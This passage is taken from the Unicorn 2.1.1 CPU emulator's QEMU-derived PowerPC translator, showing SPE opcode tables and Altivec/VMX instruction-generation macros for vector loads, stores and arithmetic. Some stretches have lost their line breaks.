GEN_SPE(efdcfui, efdcfsi, 0x18, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdcfuf, efdcfsf, 0x19, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdctui, efdctsi, 0x1A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdctuf, efdctsf, 0x1B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdctuiz, speundef, 0x1C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE); //
GEN_SPE(efdctsiz, speundef, 0x1D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE); //
GEN_SPE(efdtstgt, efdtstlt, 0x1E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE); //
GEN_SPE(efdtsteq, speundef, 0x1F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_DOUBLE); //

#undef GEN_SPE
#undef GEN_SPEOP_LDST

unicorn-2.1.1/qemu/target/ppc/translate/spe-ops.inc.c

GEN_HANDLER2(evsel0, "evsel", 0x04, 0x1c, 0x09, 0x00000000, PPC_SPE),
GEN_HANDLER2(evsel1, "evsel", 0x04, 0x1d, 0x09, 0x00000000, PPC_SPE),
GEN_HANDLER2(evsel2, "evsel", 0x04, 0x1e, 0x09, 0x00000000, PPC_SPE),
GEN_HANDLER2(evsel3, "evsel", 0x04, 0x1f, 0x09, 0x00000000, PPC_SPE),

#define GEN_SPE(name0, name1, opc2, opc3, inval0, inval1, type) \
    GEN_OPCODE_DUAL(name0##_##name1, 0x04, opc2, opc3, inval0, inval1, type, PPC_NONE)
GEN_SPE(evaddw, speundef, 0x00, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE),
GEN_SPE(evaddiw, speundef, 0x01, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE),
GEN_SPE(evsubfw, speundef, 0x02, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE),
GEN_SPE(evsubifw, speundef, 0x03, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE),
GEN_SPE(evabs, evneg, 0x04, 0x08, 0x0000F800, 0x0000F800, PPC_SPE),
GEN_SPE(evextsb, evextsh, 0x05, 0x08, 0x0000F800, 0x0000F800, PPC_SPE),
GEN_SPE(evrndw, evcntlzw, 0x06, 0x08, 0x0000F800, 0x0000F800, PPC_SPE),
GEN_SPE(evcntlsw, brinc, 0x07, 0x08, 0x0000F800, 0x00000000, PPC_SPE),
GEN_SPE(evmra, speundef, 0x02, 0x13, 0x0000F800, 0xFFFFFFFF, PPC_SPE),
GEN_SPE(speundef, evand, 0x08, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE),
GEN_SPE(evandc, speundef, 0x09, 0x08, 0x00000000,
0xFFFFFFFF, PPC_SPE), GEN_SPE(evxor, evor, 0x0B, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evnor, eveqv, 0x0C, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumi, evmwsmi, 0x0C, 0x11, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumia, evmwsmia, 0x1C, 0x11, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumiaa, evmwsmiaa, 0x0C, 0x15, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(speundef, evorc, 0x0D, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE), GEN_SPE(evnand, speundef, 0x0F, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evsrwu, evsrws, 0x10, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evsrwiu, evsrwis, 0x11, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evslw, speundef, 0x12, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evslwi, speundef, 0x13, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evrlw, evsplati, 0x14, 0x08, 0x00000000, 0x0000F800, PPC_SPE), GEN_SPE(evrlwi, evsplatfi, 0x15, 0x08, 0x00000000, 0x0000F800, PPC_SPE), GEN_SPE(evmergehi, evmergelo, 0x16, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmergehilo, evmergelohi, 0x17, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evcmpgtu, evcmpgts, 0x18, 0x08, 0x00600000, 0x00600000, PPC_SPE), GEN_SPE(evcmpltu, evcmplts, 0x19, 0x08, 0x00600000, 0x00600000, PPC_SPE), GEN_SPE(evcmpeq, speundef, 0x1A, 0x08, 0x00600000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evfsadd, evfssub, 0x00, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(evfsabs, evfsnabs, 0x02, 0x0A, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE), GEN_SPE(evfsneg, speundef, 0x03, 0x0A, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfsmul, evfsdiv, 0x04, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(evfscmpgt, evfscmplt, 0x06, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(evfscmpeq, speundef, 0x07, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfscfui, evfscfsi, 0x08, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfscfuf, evfscfsf, 0x09, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctui, evfsctsi, 0x0A, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctuf, evfsctsf, 0x0B, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctuiz, speundef, 0x0C, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfsctsiz, speundef, 0x0D, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfststgt, evfststlt, 0x0E, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(evfststeq, speundef, 0x0F, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsadd, efssub, 0x00, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(efsabs, efsnabs, 0x02, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE), GEN_SPE(efsneg, speundef, 0x03, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsmul, efsdiv, 0x04, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(efscmpgt, efscmplt, 0x06, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(efscmpeq, efscfd, 0x07, 0x0B, 0x00600000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efscfui, efscfsi, 0x08, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efscfuf, efscfsf, 0x09, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctui, efsctsi, 0x0A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctuf, efsctsf, 0x0B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctuiz, speundef, 0x0C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsctsiz, speundef, 0x0D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efststgt, efststlt, 0x0E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(efststeq, speundef, 0x0F, 0x0B, 0x00600000, 
        0xFFFFFFFF, PPC_SPE_SINGLE),
GEN_SPE(efdadd, efdsub, 0x10, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE),
GEN_SPE(efdcfuid, efdcfsid, 0x11, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdabs, efdnabs, 0x12, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_DOUBLE),
GEN_SPE(efdneg, speundef, 0x13, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_DOUBLE),
GEN_SPE(efdmul, efddiv, 0x14, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE),
GEN_SPE(efdctuidz, efdctsidz, 0x15, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdcmpgt, efdcmplt, 0x16, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE),
GEN_SPE(efdcmpeq, efdcfs, 0x17, 0x0B, 0x00600000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdcfui, efdcfsi, 0x18, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdcfuf, efdcfsf, 0x19, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdctui, efdctsi, 0x1A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdctuf, efdctsf, 0x1B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE),
GEN_SPE(efdctuiz, speundef, 0x1C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE),
GEN_SPE(efdctsiz, speundef, 0x1D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE),
GEN_SPE(efdtstgt, efdtstlt, 0x1E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE),
GEN_SPE(efdtsteq, speundef, 0x1F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_DOUBLE),

#define GEN_SPEOP_LDST(name, opc2, sh) \
    GEN_HANDLER(name, 0x04, opc2, 0x0C, 0x00000000, PPC_SPE)
GEN_SPEOP_LDST(evldd, 0x00, 3),
GEN_SPEOP_LDST(evldw, 0x01, 3),
GEN_SPEOP_LDST(evldh, 0x02, 3),
GEN_SPEOP_LDST(evlhhesplat, 0x04, 1),
GEN_SPEOP_LDST(evlhhousplat, 0x06, 1),
GEN_SPEOP_LDST(evlhhossplat, 0x07, 1),
GEN_SPEOP_LDST(evlwhe, 0x08, 2),
GEN_SPEOP_LDST(evlwhou, 0x0A, 2),
GEN_SPEOP_LDST(evlwhos, 0x0B, 2),
GEN_SPEOP_LDST(evlwwsplat, 0x0C, 2),
GEN_SPEOP_LDST(evlwhsplat, 0x0E, 2),
GEN_SPEOP_LDST(evstdd, 0x10, 3),
GEN_SPEOP_LDST(evstdw, 0x11, 3),
GEN_SPEOP_LDST(evstdh, 0x12, 3),
GEN_SPEOP_LDST(evstwhe, 0x18, 2),
GEN_SPEOP_LDST(evstwho, 0x1A, 2),
GEN_SPEOP_LDST(evstwwe, 0x1C, 2),
GEN_SPEOP_LDST(evstwwo, 0x1E, 2),

unicorn-2.1.1/qemu/target/ppc/translate/vmx-impl.inc.c

/*
 * translate/vmx-impl.c
 *
 * Altivec/VMX translation
 */

/*** Altivec vector extension ***/
/* Altivec registers moves */

static inline TCGv_ptr gen_avr_ptr(TCGContext *tcg_ctx, int reg)
{
    TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx);
    tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, avr_full_offset(reg));
    return r;
}

#define GEN_VR_LDX(name, opc2, opc3) \
static void glue(gen_, name)(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv EA; \
    TCGv_i64 avr; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    gen_set_access_type(ctx, ACCESS_INT); \
    avr = tcg_temp_new_i64(tcg_ctx); \
    EA = tcg_temp_new(tcg_ctx); \
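    /* lvx/lvxl ignore the low four EA bits: compute the address, then force 16-byte alignment before the two 64-bit loads below. */ \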
    gen_addr_reg_index(ctx, EA); \
    tcg_gen_andi_tl(tcg_ctx, EA, EA, ~0xf); \
    /* \
     * We only need to swap high and low halves. gen_qemu_ld64_i64 \
     * does the necessary 64-bit byteswap already. \
     */ \
    if (ctx->le_mode) { \
        gen_qemu_ld64_i64(ctx, avr, EA); \
        set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \
        tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \
        gen_qemu_ld64_i64(ctx, avr, EA); \
        set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \
    } else { \
        gen_qemu_ld64_i64(ctx, avr, EA); \
        set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \
        tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \
        gen_qemu_ld64_i64(ctx, avr, EA); \
        set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \
    } \
    tcg_temp_free(tcg_ctx, EA); \
    tcg_temp_free_i64(tcg_ctx, avr); \
}

#define GEN_VR_STX(name, opc2, opc3) \
static void gen_st##name(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv EA; \
    TCGv_i64 avr; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    gen_set_access_type(ctx, ACCESS_INT); \
    avr = tcg_temp_new_i64(tcg_ctx); \
    EA = tcg_temp_new(tcg_ctx); \
    gen_addr_reg_index(ctx, EA); \
    tcg_gen_andi_tl(tcg_ctx, EA, EA, ~0xf); \
    /* \
     * We only need to swap high and low halves. gen_qemu_st64_i64 \
     * does the necessary 64-bit byteswap already. \
     */ \
    if (ctx->le_mode) { \
        get_avr64(tcg_ctx, avr, rD(ctx->opcode), false); \
        gen_qemu_st64_i64(ctx, avr, EA); \
        tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \
        get_avr64(tcg_ctx, avr, rD(ctx->opcode), true); \
        gen_qemu_st64_i64(ctx, avr, EA); \
    } else { \
        get_avr64(tcg_ctx, avr, rD(ctx->opcode), true); \
        gen_qemu_st64_i64(ctx, avr, EA); \
        tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \
        get_avr64(tcg_ctx, avr, rD(ctx->opcode), false); \
        gen_qemu_st64_i64(ctx, avr, EA); \
    } \
    tcg_temp_free(tcg_ctx, EA); \
    tcg_temp_free_i64(tcg_ctx, avr); \
}

#define GEN_VR_LVE(name, opc2, opc3, size) \
static void gen_lve##name(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv EA; \
    TCGv_ptr rs; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    gen_set_access_type(ctx, ACCESS_INT); \
    EA = tcg_temp_new(tcg_ctx); \
    gen_addr_reg_index(ctx, EA); \
    if (size > 1) { \
        tcg_gen_andi_tl(tcg_ctx, EA, EA, ~(size - 1)); \
    } \
    rs = gen_avr_ptr(tcg_ctx, rS(ctx->opcode)); \
    gen_helper_lve##name(tcg_ctx, tcg_ctx->cpu_env, rs, EA); \
    tcg_temp_free(tcg_ctx, EA); \
    tcg_temp_free_ptr(tcg_ctx, rs); \
}

#define GEN_VR_STVE(name, opc2, opc3, size) \
static void gen_stve##name(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv EA; \
    TCGv_ptr rs; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    gen_set_access_type(ctx, ACCESS_INT); \
    EA = tcg_temp_new(tcg_ctx); \
    gen_addr_reg_index(ctx, EA); \
    if (size > 1) { \
        tcg_gen_andi_tl(tcg_ctx, EA, EA, ~(size - 1)); \
    } \
    rs = gen_avr_ptr(tcg_ctx, rS(ctx->opcode)); \
    gen_helper_stve##name(tcg_ctx, tcg_ctx->cpu_env, rs, EA); \
    tcg_temp_free(tcg_ctx, EA); \
    tcg_temp_free_ptr(tcg_ctx, rs); \
}

GEN_VR_LDX(lvx, 0x07, 0x03);
/* As we don't emulate the cache, lvxl is strictly equivalent to lvx */
GEN_VR_LDX(lvxl, 0x07, 0x0B);
GEN_VR_LVE(bx, 0x07, 0x00, 1);
GEN_VR_LVE(hx, 0x07, 0x01, 2);
GEN_VR_LVE(wx, 0x07, 0x02, 4);
GEN_VR_STX(svx, 0x07, 0x07);
/* As we don't emulate the cache, stvxl is strictly equivalent to stvx */
GEN_VR_STX(svxl, 0x07, 0x0F);
GEN_VR_STVE(bx, 0x07, 0x04, 1);
GEN_VR_STVE(hx, 0x07, 0x05, 2);
GEN_VR_STVE(wx, 0x07, 0x06, 4);

static void gen_mfvscr(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t;
    TCGv_i64
avr; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } avr = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, avr, 0); set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); t = tcg_temp_new_i32(tcg_ctx); gen_helper_mfvscr(tcg_ctx, t, tcg_ctx->cpu_env); tcg_gen_extu_i32_i64(tcg_ctx, avr, t); set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); tcg_temp_free_i32(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, avr); } static void gen_mtvscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 val; int bofs; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } val = tcg_temp_new_i32(tcg_ctx); bofs = avr_full_offset(rB(ctx->opcode)); #ifdef HOST_WORDS_BIGENDIAN bofs += 3 * 4; #endif tcg_gen_ld_i32(tcg_ctx, val, tcg_ctx->cpu_env, bofs); gen_helper_mtvscr(tcg_ctx, tcg_ctx->cpu_env, val); tcg_temp_free_i32(tcg_ctx, val); } #define GEN_VX_VMUL10(name, add_cin, ret_carry) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ TCGv_i64 avr; \ TCGv_i64 ten, z; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ avr = tcg_temp_new_i64(tcg_ctx); \ ten = tcg_const_i64(tcg_ctx, 10); \ z = tcg_const_i64(tcg_ctx, 0); \ \ if (add_cin) { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), false); \ tcg_gen_mulu2_i64(tcg_ctx, t0, t1, avr, ten); \ get_avr64(tcg_ctx, avr, rB(ctx->opcode), false); \ tcg_gen_andi_i64(tcg_ctx, t2, avr, 0xF); \ tcg_gen_add2_i64(tcg_ctx, avr, t2, t0, t1, t2, z); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ } else { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), false); \ tcg_gen_mulu2_i64(tcg_ctx, avr, t2, avr, ten); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ } \ \ if (ret_carry) { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), true); \ tcg_gen_mulu2_i64(tcg_ctx, t0, t1, avr, ten); \ tcg_gen_add2_i64(tcg_ctx, t0, avr, t0, t1, t2, z); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ set_avr64(tcg_ctx, rD(ctx->opcode), z, true); \ } else { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), true); \ tcg_gen_mul_i64(tcg_ctx, t0, avr, ten); \ tcg_gen_add_i64(tcg_ctx, avr, t0, t2); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \ } \ \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ tcg_temp_free_i64(tcg_ctx, avr); \ tcg_temp_free_i64(tcg_ctx, ten); \ tcg_temp_free_i64(tcg_ctx, z); \ } \ GEN_VX_VMUL10(vmul10uq, 0, 0); GEN_VX_VMUL10(vmul10euq, 1, 0); GEN_VX_VMUL10(vmul10cuq, 0, 1); GEN_VX_VMUL10(vmul10ecuq, 1, 1); #define GEN_VXFORM_V(name, vece, tcg_op, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ tcg_op(tcg_ctx, vece, \ avr_full_offset(rD(ctx->opcode)), \ avr_full_offset(rA(ctx->opcode)), \ avr_full_offset(rB(ctx->opcode)), \ 16, 16); \ } /* Logical operations */ GEN_VXFORM_V(vand, MO_64, tcg_gen_gvec_and, 2, 16); GEN_VXFORM_V(vandc, MO_64, tcg_gen_gvec_andc, 2, 17); GEN_VXFORM_V(vor, MO_64, tcg_gen_gvec_or, 2, 18); GEN_VXFORM_V(vxor, MO_64, tcg_gen_gvec_xor, 2, 19); GEN_VXFORM_V(vnor, MO_64, tcg_gen_gvec_nor, 2, 20); GEN_VXFORM_V(veqv, MO_64, tcg_gen_gvec_eqv, 2, 26); GEN_VXFORM_V(vnand, MO_64, tcg_gen_gvec_nand, 2, 22); GEN_VXFORM_V(vorc, MO_64, tcg_gen_gvec_orc, 2, 
    21);

#define GEN_VXFORM(name, opc2, opc3) \
static void glue(gen_, name)(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv_ptr ra, rb, rd; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \
    rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \
    rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \
    gen_helper_##name(tcg_ctx, rd, ra, rb); \
    tcg_temp_free_ptr(tcg_ctx, ra); \
    tcg_temp_free_ptr(tcg_ctx, rb); \
    tcg_temp_free_ptr(tcg_ctx, rd); \
}

#define GEN_VXFORM_TRANS(name, opc2, opc3) \
static void glue(gen_, name)(DisasContext *ctx) \
{ \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    trans_##name(ctx); \
}

#define GEN_VXFORM_ENV(name, opc2, opc3) \
static void glue(gen_, name)(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv_ptr ra, rb, rd; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \
    rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \
    rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \
    gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb); \
    tcg_temp_free_ptr(tcg_ctx, ra); \
    tcg_temp_free_ptr(tcg_ctx, rb); \
    tcg_temp_free_ptr(tcg_ctx, rd); \
}

#define GEN_VXFORM3(name, opc2, opc3) \
static void glue(gen_, name)(DisasContext *ctx) \
{ \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \
    TCGv_ptr ra, rb, rc, rd; \
    if (unlikely(!ctx->altivec_enabled)) { \
        gen_exception(ctx, POWERPC_EXCP_VPU); \
        return; \
    } \
    ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \
    rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \
    rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); \
    rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \
    gen_helper_##name(tcg_ctx, rd, ra, rb, rc); \
    tcg_temp_free_ptr(tcg_ctx, ra); \
    tcg_temp_free_ptr(tcg_ctx, rb); \
    tcg_temp_free_ptr(tcg_ctx, rc); \
    tcg_temp_free_ptr(tcg_ctx, rd); \
}

/*
 * Support for Altivec instruction pairs that use bit 31 (Rc) as
 * an opcode bit. In general, these pairs come from different
 * versions of the ISA, so we must also support a pair of flags for
 * each instruction.
 */
#define GEN_VXFORM_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1) \
static void glue(gen_, name0##_##name1)(DisasContext *ctx) \
{ \
    if ((Rc(ctx->opcode) == 0) && \
        ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \
        gen_##name0(ctx); \
    } else if ((Rc(ctx->opcode) == 1) && \
               ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \
        gen_##name1(ctx); \
    } else { \
        gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \
    } \
}

/*
 * We use this macro when one instruction is realized with direct
 * translation and the second one with a helper.
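 * For instance, vmrgow below pairs a direct translation (trans_vmrgow)
 * with the vextuwlx helper under GEN_VXFORM_TRANS_DUAL.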
*/ #define GEN_VXFORM_TRANS_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1)\ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ trans_##name0(ctx); \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \ gen_##name1(ctx); \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } /* Adds support to provide invalid mask */ #define GEN_VXFORM_DUAL_EXT(name0, flg0, flg2_0, inval0, \ name1, flg1, flg2_1, inval1) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0)) && \ !(ctx->opcode & inval0)) { \ gen_##name0(ctx); \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1)) && \ !(ctx->opcode & inval1)) { \ gen_##name1(ctx); \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } #define GEN_VXFORM_HETRO(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } GEN_VXFORM_V(vaddubm, MO_8, tcg_gen_gvec_add, 0, 0); GEN_VXFORM_DUAL_EXT(vaddubm, PPC_ALTIVEC, PPC_NONE, 0, \ vmul10cuq, PPC_NONE, PPC2_ISA300, 0x0000F800) GEN_VXFORM_V(vadduhm, MO_16, tcg_gen_gvec_add, 0, 1); GEN_VXFORM_DUAL(vadduhm, PPC_ALTIVEC, PPC_NONE, \ vmul10ecuq, PPC_NONE, PPC2_ISA300) GEN_VXFORM_V(vadduwm, MO_32, tcg_gen_gvec_add, 0, 2); GEN_VXFORM_V(vaddudm, MO_64, tcg_gen_gvec_add, 0, 3); GEN_VXFORM_V(vsububm, MO_8, tcg_gen_gvec_sub, 0, 16); GEN_VXFORM_V(vsubuhm, MO_16, tcg_gen_gvec_sub, 0, 17); GEN_VXFORM_V(vsubuwm, MO_32, tcg_gen_gvec_sub, 0, 18); GEN_VXFORM_V(vsubudm, MO_64, tcg_gen_gvec_sub, 0, 19); GEN_VXFORM_V(vmaxub, MO_8, tcg_gen_gvec_umax, 1, 0); GEN_VXFORM_V(vmaxuh, MO_16, tcg_gen_gvec_umax, 1, 1); GEN_VXFORM_V(vmaxuw, MO_32, tcg_gen_gvec_umax, 1, 2); GEN_VXFORM_V(vmaxud, MO_64, tcg_gen_gvec_umax, 1, 3); GEN_VXFORM_V(vmaxsb, MO_8, tcg_gen_gvec_smax, 1, 4); GEN_VXFORM_V(vmaxsh, MO_16, tcg_gen_gvec_smax, 1, 5); GEN_VXFORM_V(vmaxsw, MO_32, tcg_gen_gvec_smax, 1, 6); GEN_VXFORM_V(vmaxsd, MO_64, tcg_gen_gvec_smax, 1, 7); GEN_VXFORM_V(vminub, MO_8, tcg_gen_gvec_umin, 1, 8); GEN_VXFORM_V(vminuh, MO_16, tcg_gen_gvec_umin, 1, 9); GEN_VXFORM_V(vminuw, 